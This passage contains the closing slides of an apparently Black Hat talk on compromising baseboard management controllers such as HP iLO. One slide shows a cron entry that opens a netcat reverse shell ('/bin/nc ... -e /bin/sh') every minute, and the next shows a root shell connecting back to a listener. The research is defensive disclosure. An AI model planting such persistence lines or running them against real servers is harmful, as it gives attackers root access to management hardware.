![Page 80: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/80.jpg)
$ ls -lhadrwxr-xr-x 2 root root 1.0K Feb 22 19:11 .drwxr-xr-x 19 root root 1.0K Dec 31 1999 ..-rwxrwxrwx 1 root root 48 Feb 21 19:54 root$ cat root* * * * * /bin/nc 192.168.1.136 4040 -e /bin/sh
Setting up a cron file
80
![Page 81: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/81.jpg)
user@ilohop:~$ nc -v -l 4040Listening on [0.0.0.0] (family 0, port 4040)Connection from [192.168.1.135] port 4040 [tcp/*] accepted (family 2, sport 59455)$ iduid=0(root) gid=0(root) groups=0(root)
Getting a connect back!
81
![Page 82: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/82.jpg)
DEMO TIME!82
![Page 83: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/83.jpg)
A bunch of proprietary protocols to be analyzed
Write Exploits for the HP ILO 2
Analyze tools used to remotely manage BMC
More Research on DMA
83
TODO
LOMs and NC-SI
![Page 84: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/84.jpg)
CONCLUSION
84
![Page 85: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/85.jpg)
85
![Page 86: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/86.jpg)
Questions?
86
![Page 87: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/87.jpg)
SHOUT OUT TO OUR AMAZING TEAM!
Mr R., Oren, ivan, juan, EMI, LEFF, BAS and DANNY
@nicowaisman @gnuler 87
(We are hiring)